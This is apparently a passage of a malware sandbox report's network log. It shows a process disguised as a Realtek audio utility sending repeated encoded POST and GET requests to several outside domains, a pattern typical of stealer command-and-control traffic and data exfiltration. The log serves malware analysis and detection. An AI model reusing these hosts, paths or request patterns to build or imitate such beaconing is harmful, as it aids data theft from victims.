                                                                                Data Ascii: 2WLcH=OubFpWeL9aee3o8CXGkFXN6/2rIomS/kkfLcmHtmD4u3AQC/kbgo+k2W5XSDD2xu0MiDxO+3ORsNlmgGlr2lEN80+k7Ry9NQRNSitXlUiDDB4Twm1fjx1XrrYGNEcBzrFGVpHfklV33mLU343IuXefIr3aXukBBuIXmexNAhmT8LQWds6xbWV+lBj89q/wqkdrPxGCdQfakL7e67MBce/go=
Nov 25, 2024 11:59:33.126393080 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 10:59:33 GMT
                                                                                Server: Apache
                                                                                Content-Length: 493
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.11.20 | 49773 | 66.29.149.46 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 11:59:35.641129971 CET | 2578 | OUT | POST /rb2m/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.golivenow.live
                                                                                Origin: http://www.golivenow.live
                                                                                Referer: http://www.golivenow.live/rb2m/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
Data Ascii: 2WLcH= [TRUNCATED]
                                                                                Nov 25, 2024 11:59:35.641202927 CET | 5156 | OUT
                                                                                Data Ascii: h3xYIW52Nx4rai68xuU8WfS3OgBkI8XZDDWNCAniSI1Ll6PMAQwRJF3lWP0ReCtjnMm/i96BPKp9QHrAiTVwXPfN0unbS7c7eDGTstFTvqnm3L48U5k/aJ/78OW3EOPrHgxgg/Rif54BuuvdY0J1lpZjcmXPDUjNaAk9fuw+Ld0SjKHKTLoUhTZDlFhqwpyQUMnQuEQjRpPV5QdUNnPpuqMUv9uT+WRFaOQNOCGMhfOeL2YD4eP
                                                                                Nov 25, 2024 11:59:35.641217947 CET | 159 | OUT
                                                                                Data Ascii: ZRg1PszKMUAe0THf8cruEx+X4bg+kEIBnsnmujrYQAZlskh5+LlbCQGSCi9aYpyTYHHfsedSxRGQ1Ya4bv8ZYp6Tx6Vuf22DqIZNUJ8NWkhBGa3yyoeNz6iHxoiLXu08Wdn+bwY0ruQt8ClTXfms3em+oMNmw==
                                                                                Nov 25, 2024 11:59:35.818600893 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 10:59:35 GMT
                                                                                Server: Apache
                                                                                Content-Length: 493
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                33 | 192.168.11.20 | 49774 | 66.29.149.46 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 11:59:38.326308966 CET | 456 | OUT | GET /rb2m/?2WLcH=Dszlqgj74cWUzrw4FgoVa9SEyJwv0S7kouPjlT8bGIWxA2GhpIId8RbI+3ekZHN60cH9zamMOD41tV9XrOGIH+Ivz1i08chkDZaL4252rRmFu2Eqz92NoWw=&ZQ=9w6eOuayM HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.golivenow.live
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 11:59:38.501161098 CET | 652 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 10:59:38 GMT
                                                                                Server: Apache
                                                                                Content-Length: 493
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                34 | 192.168.11.20 | 49775 | 81.88.58.216 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 11:59:43.968888044 CET | 736 | OUT | POST /2muc/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.kanadeviainova.net
                                                                                Origin: http://www.kanadeviainova.net
                                                                                Referer: http://www.kanadeviainova.net/2muc/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Ascii: 2WLcH=MEsIJNTNitswnwaaAe634ZzQ9r5u4NAckqyUw4btO+6n8ycCCnyQhTbUf6n9JOARS3NAvFTqFFwoaGdiC5U0GBnoIiNK39qkzQrWnh9wDrGDAZdV2NIVKKGLix0FOxvOPufNsVTMQqlFxz0Vg5oThMQJo3HjZwvx6kkCK8Rb+56krjy3e9bkx3BZXbxNniZ5Mg==
                                                                                Nov 25, 2024 11:59:44.168876886 CET | 321 | IN | HTTP/1.1 405 Not Allowed
                                                                                Server: openresty/1.21.4.1
                                                                                Date: Mon, 25 Nov 2024 10:59:44 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 163
                                                                                Connection: close
                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty/1.21.4.1</center></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                35 | 192.168.11.20 | 49776 | 81.88.58.216 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 11:59:46.685868979 CET | 756 | OUT | POST /2muc/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.kanadeviainova.net
                                                                                Origin: http://www.kanadeviainova.net
                                                                                Referer: http://www.kanadeviainova.net/2muc/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Ascii: 2WLcH=MEsIJNTNitswnQqaH/63wZzX4r5uj9BVkq2Uw8DHONen8QUCDjmQszbUM6n4WeBdS3RyvHHqFEUoaEViBPczUhmOACNM5dqkzQrWnhpeDvqDAptVwpcaAqGM0B0FKxvCPufzsQypQpdFxzkVgrQQvMQHlXHxcySe33olFbxInLWLu1/tDPvAykdrTrIllgYiRoJf6ErvrySBrOJkZKQwUps=
                                                                                Nov 25, 2024 11:59:46.885819912 CET | 321 | IN | HTTP/1.1 405 Not Allowed
                                                                                Server: openresty/1.21.4.1
                                                                                Date: Mon, 25 Nov 2024 10:59:46 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 163
                                                                                Connection: close
                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty/1.21.4.1</center></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                36 | 192.168.11.20 | 49777 | 81.88.58.216 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 11:59:49.403465986 CET | 2578 | OUT | POST /2muc/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.kanadeviainova.net
                                                                                Origin: http://www.kanadeviainova.net
                                                                                Referer: http://www.kanadeviainova.net/2muc/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Ascii: 2WLcH=MEsIJNTNitswnQqaH/63wZzX4r5uj9BVkq2Uw8DHONWn9isCCBOQtzbUP6n5WeAHS3J2vHKfFH8obhBiA90zehmOCCNN39qUzQ6fnh5eDvqDAvpV39IaGqGLix0JOxuVPuHjsQ3cRY9FyX4ViYoQnMQFgXGicyeB330pFbtinNWLvRvwT7vhjU5HXKcn0Rkufagn+TbRiVKZhfllOrwOX+d97u4kgq8YDlyCAbzw7nhkNzbBYqhu6l/MPUcSYoP8pff9o34ugtuvoX1fde97kwsYBh5EMs3CNcZoq9vimsjUZGDqeRqJl/euhj+U4NeINJfGEhe/fqyoScgr38fFTBbqalXtALEik2gkO5pBH0b5vuJ56Qgv6c4ucKdL0iuiDJfwZL3JsWiFQlvkGOgHA+VKdT38GKLGHJn8BCAZRH2NzQsDLAA2RLoo75E9YpcEdCWJbQXsyUm9q6u6GPjrYnfLsg3VI/KAkbFbmwaZWJCsVt/liZAFhmaUqpOHMK+tS6WVA5L5Vmo0wGquu/Li1npFzzIpTp+gvqH5m+niYToseI1Jhr+Hqfu7qT9I3z/ZFCSZ+yIV2qnoHv25a0MecJsdBtVH0iuC/YgW4S9akdhKvvOX8ofMy1Yb7fUyXpo6oFGN5rrzREDArj/3jBEa5TQ8zaIj4AIpOFACMXqj3cDitpzG5DaKpD2Hw0GvG2sSzRDL+hWFscUcF8/A/rp0OJGwSUCYhjK6Cin35GUJiCrt3VIqpjsgAXz22oqBKbRLEUrlp8TXY4fKf/+5xCLliB0Cjvwou5JoAk4tqEDsXQn5cvEM7NfGJtNJSfApnY2PtodI+UmxQTYhHOWJYFp91PSMUTCr8s9LRJevJNu5KCEDO4PqVzZPnSZjsSOEiT0e/HvHQ6V9eufQ6dhtJoOWEUhGnqiWXlXiZSeY6mL9XomqaSqJPcNNHrCYRKNLYEYv8yWfaCdrnuHJ3Qf9oANnLzMCz9dFghCphGa1fzEP1cG2W0 [TRUNCATED]
                                                                                Nov 25, 2024 11:59:49.403516054 CET | 5327 | OUT
                                                                                Data Ascii: 25mgsOvUEgllrmkYb0mpJKtX8ZWCVeuAW13jdODkB2ILg0MOMOKVy/1NoK3iU6ZSy0C7GoP0rcsXuMynupmH5D1b+ST05PGTlUEi08xvcxamEbWxwx0+FybdujCqVy7eZBM+OwiG9HzcnFkcRX5IoQ6x/IB6OOz3LfiJNPQDcj7cUowKjxe7xpoBkNVTpUDS49GkD52zGp3O00tODRUd151arkwAfTbcU6QRGkVepiRH3aak1Dm
                                                                                Nov 25, 2024 11:59:49.603893042 CET | 321 | IN | HTTP/1.1 405 Not Allowed
                                                                                Server: openresty/1.21.4.1
                                                                                Date: Mon, 25 Nov 2024 10:59:49 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 163
                                                                                Connection: close
                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty/1.21.4.1</center></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                37 | 192.168.11.20 | 49778 | 81.88.58.216 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 11:59:52.119946003 CET | 460 | OUT | GET /2muc/?2WLcH=BGEoK7nai7wQrj2aEM2P8qfkzKtqrNNfgf6S4Ju7MMLh1Bc/IyqyqzXdBYzJKfwOd0JT6GOuPVdJb0BzGYwvQg/AACFP7fG4nxHnnQpuCqy2cfx3+fFWSZg=&ZQ=9w6eOuayM HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.kanadeviainova.net
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 11:59:52.319567919 CET | 240 | IN | HTTP/1.1 200 OK
                                                                                Server: openresty/1.21.4.1
                                                                                Date: Mon, 25 Nov 2024 10:59:52 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 1423
                                                                                Last-Modified: Thu, 01 Dec 2022 14:31:17 GMT
                                                                                Connection: close
                                                                                ETag: "6388bab5-58f"
                                                                                Accept-Ranges: bytes
                                                                                Nov 25, 2024 11:59:52.319710016 CET | 1289 | IN
                                                                                Data Ascii: <html> <head> <meta itemprop="courtesy" content="3c9c48e057e67a659de8367e29874141" /> <style> #content { left: 0; line-height: 200px; margin-top: -100px;
                                                                                Nov 25, 2024 11:59:52.319814920 CET | 134 | IN
                                                                                Data Ascii: } </script> </head> <body onload="welcome()"> <h3 id='content' hidden></h3> </body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                38 | 192.168.11.20 | 49779 | 104.21.27.59 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 11:59:57.617131948 CET | 733 | OUT | POST /zet9/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.mydreamdeal.click
                                                                                Origin: http://www.mydreamdeal.click
                                                                                Referer: http://www.mydreamdeal.click/zet9/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Ascii: 2WLcH=rqjNaDZKfQFOhQHs0Zlu8pksTIhc0HlGZve736TXlqXs8XL/Tgv/7XWXqNv6tcXVk36PFqLBpwSZbVCbv5xFCj7OoEDu6bderT+42t1yvjKV3TooMJr64DwzhNF3nIytFj31OEZ8t/PwwCjZrrypJW0aCvlzzYbG3DYyYUw0u+yHnuQZJGKLq1hkbkn38PmKmQ==
                                                                                Nov 25, 2024 11:59:57.977562904 CET | 1036 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 10:59:57 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Cache-Control: no-cache, no-store, must-revalidate
                                                                                Expires: Mon, 25 Nov 2024 10:59:57 GMT
                                                                                Vary: Accept-Encoding
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V%2BlcERhqQk9RlhzyjWzAAE9rhWX%2BitvaK25Gpcx6a%2FsEuMyVoWV6orzoTdXy9UuaNIXI92JyfFuwXTYuTVqxBFy%2BtZWPoz6ASZZuApMQKrZnxIrJwYcOmy1DLRM5b79Q2xTRIi6RG1I%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e8121dd69ce8c45-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=97378&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=733&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Nov 25, 2024 11:59:57.977572918 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                39 | 192.168.11.20 | 49780 | 104.21.27.59 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 12:00:00.242579937 CET | 753 | OUT | POST /zet9/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.mydreamdeal.click
                                                                                Origin: http://www.mydreamdeal.click
                                                                                Referer: http://www.mydreamdeal.click/zet9/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Ascii: 2WLcH=rqjNaDZKfQFOgwXs4eJu9JkvKohcjXkPZva737H9l5zs8y3/cCX/8XWX5NuypcXck338FofBpwGZbRGbvOFKDz7Qw0Ds07derT+42thcvg6V3gwoKtf5xjwwiNF3jIypFj3HOBAZt9HwwHfZo6yqHW1RffkZ87i/5g05JzoSuN2zm4dDU0+vpm9WfUef+NnR7bZpyQlh47EYrrm0fTP2iOw=
                                                                                Nov 25, 2024 12:00:00.604089022 CET | 924 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 11:00:00 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Cache-Control: no-cache, no-store, must-revalidate
                                                                                Expires: Mon, 25 Nov 2024 11:00:00 GMT
                                                                                Vary: Accept-Encoding
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KVDK1uosrdd8sEhT3BAWcOWWP6BY4T4cTJV0RN0H9JxLZTjUi5Q1UIRLgCvQdm535EvH574yOqATZTq4XFy2BlKj9U1POJWI1qE42%2BaLseNt%2BFYytYeaWL44TnAHBF1LGSXflghsz6Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e8121eddaa07cb2-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=97727&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=753&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                40 | 192.168.11.20 | 49781 | 104.21.27.59 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 12:00:02.866661072 CET | 2578 | OUT | POST /zet9/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.mydreamdeal.click
                                                                                Origin: http://www.mydreamdeal.click
                                                                                Referer: http://www.mydreamdeal.click/zet9/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 12:00:03.227453947 CET | 935 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 11:00:03 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Cache-Control: no-cache, no-store, must-revalidate
                                                                                Expires: Mon, 25 Nov 2024 11:00:03 GMT
                                                                                Vary: Accept-Encoding
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M08C4w6iHMkejvMUlOJHWgUjvlguRNdZ37PYUySoP5H%2B%2BrBkuXbwp6bh7WiL546gVhtXUUciL%2B9GBZrw3T%2FHZD%2BEA66YHq%2FMgdPPhvVbFU%2FptvI12rDszOBym05syhDfwV1kfi0youk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e8121fe3c380f73-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=97079&sent=7&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7902&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Nov 25, 2024 12:00:03.227494955 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                41 | 192.168.11.20 | 49782 | 104.21.27.59 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 12:00:05.489787102 CET | 459 | OUT | GET /zet9/?2WLcH=moLtZ3Q2YS5/hkjwzodJ1swdKZQozUlOYqvt2cuq7Yvv9xGOVSWf5GjI0u28lvuJt3GCOLDggiamVwDKnOFVInrpmEPV2qsYzTve7f9TvzKyqWkrNPKErR0=&ZQ=9w6eOuayM HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.mydreamdeal.click
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 12:00:05.860534906 CET | 882 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 11:00:05 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Cache-Control: no-cache, no-store, must-revalidate
                                                                                Expires: Mon, 25 Nov 2024 11:00:05 GMT
                                                                                Vary: Accept-Encoding
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fq6BqqEdoWpQ9ntbbyo3mXRnTIHHj600qh9DMlw8R1mUoIKNdBa6xg2idEcpxY1qEeXPltAXDsD9TYCT3%2BtYl%2BTmPHK5DIpZrLWGpqPeMeC71y3ChD9ii8gnVEs4IM0y%2B0ohaeMT4h0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e81220e9c19c454-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=97126&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=459&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Nov 25, 2024 12:00:05.860546112 CET | 153 | IN | Data Ascii: 93<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0</center></body></html>
                                                                                Nov 25, 2024 12:00:05.860553980 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                42 | 192.168.11.20 | 49783 | 45.81.23.25 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 12:00:11.234292984 CET | 715 | OUT | POST /ij3v/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.aquax.cloud
                                                                                Origin: http://www.aquax.cloud
                                                                                Referer: http://www.aquax.cloud/ij3v/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Ascii: 2WLcH=U3A76ahUqyCMabnpA0vzSh1Splt6110dPZjCxksrsnwKgt4wLv0d26W+GhEgx2qCe0tOFAS6w7tx/jAAPqrfuD7WR9dk5x25+5pzVpiYp4hWz66mzFtcG9GoPIYfwY8wjGvcPPiwd/pvqkYwQe6e+G9IKCJ2LVQUa/cdWu0tQmzVL8dg/wL5U0VWSsiawplLsw==
                                                                                Nov 25, 2024 12:00:11.407145023 CET | 413 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 11:00:11 GMT
                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
                                                                                Content-Length: 203
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ij3v/ was not found on this server.</p></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                43 | 192.168.11.20 | 49784 | 45.81.23.25 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 25, 2024 12:00:13.941138029 CET | 735 | OUT | POST /ij3v/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.aquax.cloud
                                                                                Origin: http://www.aquax.cloud
                                                                                Referer: http://www.aquax.cloud/ij3v/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Ascii: 2WLcH=U3A76ahUqyCMb4vpGXHzTB1Nslt6/V0RPZvCxg07tRAKgMIwItQd36W+eREh/WqJe0hGFC26w4Rx/hYAOZDYhz7UX9dc3R25+5pzVoCip45WwKKmxnJfF9Grf4Yf0Y80jGviPKDrd5lvqnMwQNiBxG9SUyJlL2hNWNQ2G/ILWknxKqQ6iC/dXnJkWcbyyrkQx4zv/H/SsdFva7MiH7Vk0wk=
                                                                                Nov 25, 2024 12:00:14.113862991 CET | 413 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 11:00:14 GMT
                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
                                                                                Content-Length: 203
                                                                                Connection: close
